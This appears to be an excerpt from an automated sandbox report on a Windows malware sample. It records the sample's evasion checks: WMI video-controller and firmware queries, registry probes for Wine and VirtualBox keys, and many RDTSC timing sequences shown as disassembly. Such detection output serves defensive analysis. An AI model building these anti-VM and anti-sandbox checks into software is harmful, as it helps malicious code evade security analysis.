                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: A192CE second address: A192D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9AD5A second address: B9AD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9AD5E second address: B9AD7B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BB4D69EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F1BB4D69EAEh 0x00000010 push ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B3EE second address: B9B3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B3F4 second address: B9B3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B3F8 second address: B9B402 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BB4E5F526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B574 second address: B9B584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1BB4D69EABh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B584 second address: B9B5BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F1BB4E5F539h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B5BA second address: B9B5C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B5C9 second address: B9B5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9B5CF second address: B9B5FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EAEh 0x00000009 jmp 00007F1BB4D69EB9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9F1BC second address: B9F1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9F286 second address: B9F28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9F457 second address: B9F4D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 1894DCBBh 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F1BB4E5F528h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 lea ebx, dword ptr [ebp+1245A129h] 0x0000002e call 00007F1BB4E5F539h 0x00000033 call 00007F1BB4E5F52Ch 0x00000038 jmp 00007F1BB4E5F535h 0x0000003d pop ecx 0x0000003e pop esi 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 jp 00007F1BB4E5F52Ch 0x00000048 jg 00007F1BB4E5F526h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9F4D5 second address: B9F4DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9F5A9 second address: B9F5D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1BB4E5F533h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 ja 00007F1BB4E5F526h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9F5D1 second address: B9F695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edi 0x0000000d pushad 0x0000000e jmp 00007F1BB4D69EAAh 0x00000013 jnl 00007F1BB4D69EA6h 0x00000019 popad 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jns 00007F1BB4D69EBEh 0x00000025 pop eax 0x00000026 movzx esi, bx 0x00000029 push 00000003h 0x0000002b mov di, ax 0x0000002e push 00000000h 0x00000030 movsx edx, bx 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F1BB4D69EA8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov dword ptr [ebp+122D1CAFh], ecx 0x00000055 call 00007F1BB4D69EA9h 0x0000005a push edx 0x0000005b jmp 00007F1BB4D69EB3h 0x00000060 pop edx 0x00000061 push eax 0x00000062 jmp 00007F1BB4D69EB7h 0x00000067 mov eax, dword ptr [esp+04h] 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007F1BB4D69EA8h 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BB1407 second address: BB1416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BB1416 second address: BB141C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF97B second address: BBF9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F539h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F1BB4E5F526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF9A3 second address: BBF9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF9A7 second address: BBF9B1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF9B1 second address: BBF9E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F1BB4D69EAEh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BB4D69EB8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD90C second address: BBD912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD912 second address: BBD916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD916 second address: BBD91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD91A second address: BBD920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBD920 second address: BBD939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F1BB4E5F526h 0x0000000a jmp 00007F1BB4E5F52Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBDBFF second address: BBDC09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBDC09 second address: BBDC2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F1BB4E5F52Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F1BB4E5F52Ch 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBDC2D second address: BBDC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE072 second address: BBE08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4E5F534h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE08C second address: BBE090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE090 second address: BBE094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE1EC second address: BBE1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE8C6 second address: BBE8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE8CC second address: BBE8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBE8D2 second address: BBE8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BB5F48 second address: BB5F54 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1BB4D69EA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B918C9 second address: B918DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F1BB4E5F526h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B918DA second address: B918F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1BB4D69EA6h 0x00000008 jmp 00007F1BB4D69EAAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF0C1 second address: BBF0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF0C5 second address: BBF0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EB3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BB4D69EB2h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF0F3 second address: BBF10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F537h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF10F second address: BBF115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3E6 second address: BBF3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3EC second address: BBF3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3F2 second address: BBF3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF3F6 second address: BBF404 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F1BB4D69EA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF404 second address: BBF408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF408 second address: BBF40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BBF7FC second address: BBF802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC2114 second address: BC2119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC2119 second address: BC211F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC5169 second address: BC516D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC516D second address: BC5188 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1BB4E5F526h 0x00000008 jns 00007F1BB4E5F526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F1BB4E5F528h 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BC5188 second address: BC518E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8AC91 second address: B8AC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1BB4E5F526h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B8AC9B second address: B8ACCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB6h 0x00000007 js 00007F1BB4D69EA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1BB4D69EAFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB927 second address: BCB92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB92D second address: BCB938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB938 second address: BCB93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB93C second address: BCB940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB940 second address: BCB992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F531h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F1BB4E5F535h 0x0000001c jmp 00007F1BB4E5F539h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCAF90 second address: BCAF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB4F3 second address: BCB4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB4F7 second address: BCB511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB65D second address: BCB68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F52Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jng 00007F1BB4E5F538h 0x00000014 jmp 00007F1BB4E5F532h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB68F second address: BCB693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCB693 second address: BCB697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCE94B second address: BCE94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCE94F second address: BCE959 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCE959 second address: BCE95E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF116 second address: BCF12A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F1BB4E5F530h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF21E second address: BCF224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF224 second address: BCF228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF3B5 second address: BCF3C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1BB4D69EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF3C3 second address: BCF3D5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF3D5 second address: BCF3DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCF4C8 second address: BCF4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F7D second address: BD1F87 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1BB4D69EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F87 second address: BD1F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F8D second address: BD1F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1F91 second address: BD1FB2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F1BB4E5F539h 0x00000013 pushad 0x00000014 jmp 00007F1BB4E5F52Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1FB2 second address: BD2002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F1BB4D69EA8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 pushad 0x00000021 mov dword ptr [ebp+122D1FA4h], ecx 0x00000027 mov cx, bx 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+122D2B71h] 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+122D1CDDh] 0x00000039 push 00000000h 0x0000003b cld 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 jmp 00007F1BB4D69EABh 0x00000045 pop esi 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2002 second address: BD2007 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD2AB5 second address: BD2ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
